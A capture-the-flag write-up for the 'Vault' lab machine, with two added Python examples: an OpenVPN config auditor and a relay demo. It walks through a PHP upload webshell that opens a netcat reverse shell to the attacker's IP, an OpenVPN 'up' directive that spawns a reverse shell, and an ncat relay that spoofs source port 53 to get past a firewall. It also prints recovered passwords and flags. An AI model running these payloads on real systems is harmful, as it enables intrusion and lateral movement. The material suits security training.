[Meachines] [Medium] Vault OpenVPN RCE + NC proxy lateral movement + GPG decryption

Information Gathering

IP Address      Open Ports
10.10.10.109    TCP: 22, 80

$ ip='10.10.10.109'; itf='tun0'
  # Liveness check: plain -sn here. The original combined -Pn with -sn, which skips host
  # discovery and reports every address as "Host is up", so the check never failed.
  if nmap -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
      | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
      echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
      nmap -Pn -sV -sC -p "$ports" "$ip"
    else
      echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
  else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
  fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a69d0f7d7375bba8940ab7e3fe1f24f4 (RSA)
|   256 2c7c34eb3aeb0403ac48285409743d27 (ECDSA)
|_  256 98425fad8722926d72e6666c82c10983 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Upload Webshell

http://10.10.10.109/

image.png

The page mentions Sparklays

$ feroxbuster -u 'http://10.10.10.109/sparklays' -x php

image-1.png

http://10.10.10.109/sparklays/design/changelogo.php

image-2.png

image-3.png

POST /sparklays/design/changelogo.php HTTP/1.1
Host: 10.10.10.109
Content-Length: 395
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.109
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyY59DQNIHLMl1e0R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.10.109/sparklays/design/changelogo.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryyY59DQNIHLMl1e0R
Content-Disposition: form-data; name="file"; filename="1.php5"
Content-Type: application/gif

GIF89a
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.27 443 >/tmp/f');?>
------WebKitFormBoundaryyY59DQNIHLMl1e0R
Content-Disposition: form-data; name="submit"

upload file
------WebKitFormBoundaryyY59DQNIHLMl1e0R--

$ curl -S http://10.10.10.109/sparklays/design/uploads/1.php5

image-4.png

Dave

$ cat /home/dave/Desktop/*

image-5.png

password:Dav3therav3123
key>itscominghome

image-6.png

Dave to DNS server && OpenVPN RCE

image-8.png

$ ssh -D 1090 dave@10.10.10.109

$ time for i in $(seq 1 254); do (ping -c 1 192.168.122.${i} | grep "bytes from" &); done

image-9.png

Point Burp (BP) at the SOCKS proxy on 1090

http://192.168.122.4/

image-10.png

image-11.png

https://www.bleepingcomputer.com/news/security/downloading-3rd-party-openvpn-configs-may-be-dangerous-heres-why/

remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.122.1 10032 >/tmp/f'"
nobind

image-12.png
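The config above works because the up directive runs an arbitrary command when the tunnel comes up and script-security 2 is what permits it (OpenVPN's default level 1 refuses external scripts). As an added example, not code from the write-up, here is the check to run over any .ovpn you did not write before importing it: it flags every client-side directive that executes a program, and a raised script-security level. The directive list is the one from the OpenVPN manual; the two sample configs are constructed here (the malicious one is the write-up's), and the function names are mine.

```python
"""
Added example (not from the write-up): pre-flight audit of a third-party
OpenVPN config for directives that execute commands on the client.
"""
import shlex
from typing import List, Tuple

# Client-side directives that run an external program or script (OpenVPN man page).
EXEC_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "client-connect", "client-disconnect", "auth-user-pass-verify",
    "learn-address", "plugin",
}


def audit_ovpn(text: str) -> List[Tuple[int, str, str]]:
    """Return (line, directive, arguments) for each risky line.

    Comment lines (# or ;) and inline <ca>...</ca>-style blocks are skipped so
    certificate data cannot produce false positives.
    """
    findings: List[Tuple[int, str, str]] = []
    block = None
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if block:                                      # inside <tag> ... </tag>
            if line == f"</{block}>":
                block = None
            continue
        if line.startswith("<") and line.endswith(">") and not line.startswith("</"):
            block = line[1:-1]
            continue
        if not line or line[0] in "#;":
            continue
        try:
            tokens = shlex.split(line)                 # keeps the quoted command as one token
        except ValueError:                             # unbalanced quotes: whitespace split
            tokens = line.split()
        directive, args = tokens[0].lower(), " ".join(tokens[1:])
        if directive == "script-security" and args[:1].isdigit() and int(args[:1]) >= 2:
            findings.append((lineno, directive, args))
        elif directive in EXEC_DIRECTIVES:
            findings.append((lineno, directive, args))
    return findings


def is_safe_to_import(text: str) -> bool:
    return not audit_ovpn(text)


# Constructed sample: the config used against the DNS server in this write-up.
MALICIOUS_OVPN = """\
remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.122.1 10032 >/tmp/f'"
nobind
"""

# Constructed sample: an ordinary client config with a commented-out hook and an inline CA.
BENIGN_OVPN = """\
client
dev tun
remote vpn.example.net 1194 udp
# up /etc/openvpn/update-resolv-conf   (commented out, so inactive)
script-security 1
<ca>
-----BEGIN CERTIFICATE-----
up /this/is/certificate/data/not/a/directive
-----END CERTIFICATE-----
</ca>
"""

if __name__ == "__main__":
    for name, cfg in (("malicious", MALICIOUS_OVPN), ("benign", BENIGN_OVPN)):
        print(name, audit_ovpn(cfg))
```

Run it before `openvpn --config file.ovpn`; any finding means the file can execute code as the user (or as root, which is how OpenVPN is usually started), so read the flagged lines before importing.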

$ cat /home/dave/ssh

image-21.png

dav3gerous567

User.txt

a4947faa8d4e1f80771d34234bd88c73

Privilege Escalation && NC Proxy lateral movement && gpg decrypt

$ cat /home/alex/.bash_history

image-15.png

$ grep -rHa "192.168.5.2" /var/log

image-17.png

$ nmap 192.168.5.2 -Pn -f

image-16.png

$ nmap 192.168.5.2 -Pn -f --source-port=4444

image-18.png

Use the local DNS port (53) as the source port

$ nc 192.168.5.2 987 -p 53

image-19.png

Build a tunnel with NC

Listen on local port 1801 on the DNS server as a proxy; the DNS server forwards the data to port 987 on 192.168.5.2, using local source port 53.

DNS$ SHELL=/bin/sh script -q /dev/null

DNS$ /usr/bin/ncat -l 1801 --sh-exec "ncat 192.168.5.2 987 -p 53" &

DNS$ ssh dave@localhost -p 1801 -t 'bash'

dav3gerous567

image-20.png
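What the ncat line above does, as an added example that is not code from the write-up: a small TCP relay that listens locally and, for each client, opens the upstream connection from a pinned source port (nc's -p) so the hop passes a firewall that only admits "DNS" traffic, then pumps bytes both ways. The demo wires it to a local echo server standing in for the SSH daemon on 192.168.5.2:987 and records the source port the server actually saw; binding port 53 itself needs root, so the demo pins an unprivileged port instead. Hosts and ports from the write-up appear only in comments; every function name here is mine.

```python
"""
Added example (not from the write-up): a TCP relay with a pinned outbound
source port, the same thing as
  ncat -l 1801 --sh-exec "ncat 192.168.5.2 987 -p 53"
"""
import socket
import threading
from typing import List, Tuple


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy src -> dst until EOF, then half-close dst so the far end sees EOF too."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def connect_from(target: Tuple[str, int], source_port: int) -> socket.socket:
    """Like `nc host port -p source_port`: bind the local port first, then connect."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", source_port))          # 53 in the write-up; ports < 1024 need root
    s.connect(target)
    return s


def _handle(client: socket.socket, target: Tuple[str, int], source_port: int) -> None:
    try:
        upstream = connect_from(target, source_port)
    except OSError:
        client.close()
        return
    t = threading.Thread(target=_pump, args=(client, upstream), daemon=True)
    t.start()
    _pump(upstream, client)
    t.join()
    client.close()
    upstream.close()


def start_relay(listen: Tuple[str, int], target: Tuple[str, int], source_port: int) -> int:
    """Listen on `listen`, relay each client to `target`; returns the bound listen port."""
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind(listen)
    ls.listen(8)

    def serve() -> None:
        while True:
            try:
                c, _ = ls.accept()
            except OSError:
                return
            threading.Thread(target=_handle, args=(c, target, source_port), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return ls.getsockname()[1]


def start_echo_server() -> Tuple[int, List[Tuple[str, int]]]:
    """Stand-in for 192.168.5.2:987; records each client's (ip, source port) as seen on the wire."""
    seen: List[Tuple[str, int]] = []
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.bind(("127.0.0.1", 0))
    ls.listen(8)

    def serve() -> None:
        while True:
            try:
                c, addr = ls.accept()
            except OSError:
                return
            seen.append(addr)
            threading.Thread(target=_pump, args=(c, c), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return ls.getsockname()[1], seen


def free_port() -> int:
    """Pick a currently free unprivileged port to stand in for 53 in the demo."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> Tuple[bytes, int, int]:
    """Returns (bytes echoed back, source port the server saw, source port we pinned)."""
    echo_port, seen = start_echo_server()
    pinned = free_port()
    relay_port = start_relay(("127.0.0.1", 0), ("127.0.0.1", echo_port), pinned)
    with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
        c.sendall(b"SSH-2.0-probe\r\n")
        c.shutdown(socket.SHUT_WR)     # our EOF propagates hop by hop through the relay
        got = b""
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            got += chunk
    return got, seen[0][1], pinned


if __name__ == "__main__":
    data, observed, pinned = demo()
    print(f"echoed {data!r}; server saw source port {observed} (pinned {pinned})")
```

On the DNS host the equivalent call is start_relay(("127.0.0.1", 1801), ("192.168.5.2", 987), 53) run as root, after which `ssh dave@localhost -p 1801` goes through exactly as with ncat.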

image-22.png

image-23.png

$ base32 -w0 root.txt.gpg

(The base32 text is copied to the Vault host, decoded there with base32 -d into root.gpg, and decrypted with dave's GPG key; the passphrase is the key found on dave's Desktop earlier.)

dave@ubuntu$ gpg -d root.gpg

itscominghome

image-24.png

Root.txt

ca468370b91d1f5906e31093d9bfe819

# Web security # CTF
Original link: https://www.freebuf.com/articles/web/428362.html